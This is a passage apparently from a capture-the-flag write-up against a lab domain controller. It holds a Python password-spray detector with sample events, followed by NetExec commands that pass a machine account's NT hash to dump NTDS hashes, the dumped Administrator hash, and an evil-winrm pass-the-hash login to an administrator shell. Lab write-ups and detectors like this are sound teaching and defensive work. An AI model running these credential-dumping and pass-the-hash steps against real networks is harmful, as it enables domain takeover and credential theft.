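    # Constructed: a user mistyping their password twice, then logging in (benign).
    ("2024-10-17T21:50:00", "10.20.1.77", "alice", "FAIL"),
    ("2024-10-17T21:50:05", "10.20.1.77", "alice", "FAIL"),
    ("2024-10-17T21:50:10", "10.20.1.77", "alice", "OK"),
    # Constructed: the hash spray (leaked NT hashes against the same user list).
    ("2024-10-17T21:56:00", "10.20.1.50", "Administrator", "FAIL"),
    ("2024-10-17T21:56:00", "10.20.1.50", "Guest", "FAIL"),
    ("2024-10-17T21:56:01", "10.20.1.50", "krbtgt", "FAIL"),
    ("2024-10-17T21:56:01", "10.20.1.50", "WebServer$", "FAIL"),
    ("2024-10-17T21:56:02", "10.20.1.50", "DatabaseServer$", "FAIL"),
    ("2024-10-17T21:56:02", "10.20.1.50", "FileServer$", "OK"),
]


def detect_spray(events, window=timedelta(seconds=60), min_accounts=5):
    """Return one alert per source that failed against at least `min_accounts`
    distinct accounts inside `window`, listing the accounts tried and any
    account the same source then logged in as around the spray."""
    by_source = defaultdict(list)
    for ts, src, acct, outcome in sorted(events, key=lambda e: e[0]):
        by_source[src].append((datetime.fromisoformat(ts), acct, outcome))

    alerts = []
    for src, recs in by_source.items():
        fails = [(t, a) for t, a, o in recs if o != "OK"]
        oks = [(t, a) for t, a, o in recs if o == "OK"]
        recent = []   # failures still inside the sliding window
        hit = None
        for t, a in fails:
            recent.append((t, a))
            recent = [(t0, a0) for t0, a0 in recent if t - t0 <= window]
            if len({a0 for _, a0 in recent}) >= min_accounts:
                if hit is None:
                    hit = {"source": src, "first_seen": recent[0][0],
                           "last_seen": t, "accounts": set()}
                hit["accounts"].update(a0 for _, a0 in recent)
                hit["last_seen"] = t
        if hit is not None:
            # A success from the same source near the spray is the real finding.
            lo, hi = hit["first_seen"] - window, hit["last_seen"] + window
            hit["succeeded_as"] = sorted(a for t, a in oks if lo <= t <= hi)
            hit["accounts"] = sorted(hit["accounts"])
            hit["first_seen"] = hit["first_seen"].isoformat()
            hit["last_seen"] = hit["last_seen"].isoformat()
            alerts.append(hit)
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(SAMPLE_EVENTS):
        print(f"{alert['source']}: {len(alert['accounts'])} accounts tried "
              f"between {alert['first_seen']} and {alert['last_seen']}, "
              f"succeeded as {alert['succeeded_as'] or 'nobody'}")
```

The signal is the number of distinct accounts per source, not the number of failures per account, which is why the benign alice records never trigger and why per-account lockout policies alone do not stop a spray that tries each account once. In production the same logic runs over the DC's failed and successful logon events or SMB authentication telemetry, with the window and threshold tuned to the environment.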

Therefore, we could also use this account to dump all the hashes in the domain database (NTDS) with NetExec. In this case I will only dump the Administrator user's hash:

❯ nxc smb 10.20.1.140 -u 'FileServer$' -H e41da7e79a4c76dbd9cf79d1cb325559 --ntds --user Administrator

SMB         10.20.1.140     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.20.1.140     445    DC01             [+] SOUPEDECODE.LOCAL\FileServer$:e41da7e79a4c76dbd9cf79d1cb325559 (Pwn3d!)
SMB         10.20.1.140     445    DC01             [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         10.20.1.140     445    DC01             Administrator:500:aad3b435b51404eeaad3b435b51404ee:88d40c3a9a98889f5cbb778b0db54a2f:::
SMB         10.20.1.140     445    DC01             [+] Dumped 1 NTDS hashes to /home/gunzf0x/.nxc/logs/DC01_10.20.1.140_2024-10-17_215656.ntds of which 1 were added to the database
SMB         10.20.1.140     445    DC01             [*] To extract only enabled accounts from the output file, run the following command:
SMB         10.20.1.140     445    DC01             [*] cat /home/gunzf0x/.nxc/logs/DC01_10.20.1.140_2024-10-17_215656.ntds | grep -iv disabled | cut -d ':' -f1
SMB         10.20.1.140     445    DC01             [*] grep -iv disabled /home/gunzf0x/.nxc/logs/DC01_10.20.1.140_2024-10-17_215656.ntds | cut -d ':' -f1

And use this hash to connect to the victim machine with evil-winrm through the WinRM service:

❯ evil-winrm -i 10.20.1.140 -u 'Administrator' -H '88d40c3a9a98889f5cbb778b0db54a2f'

Evil-WinRM shell v3.6

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami

soupedecode\administrator

GG.

~Happy Hacking.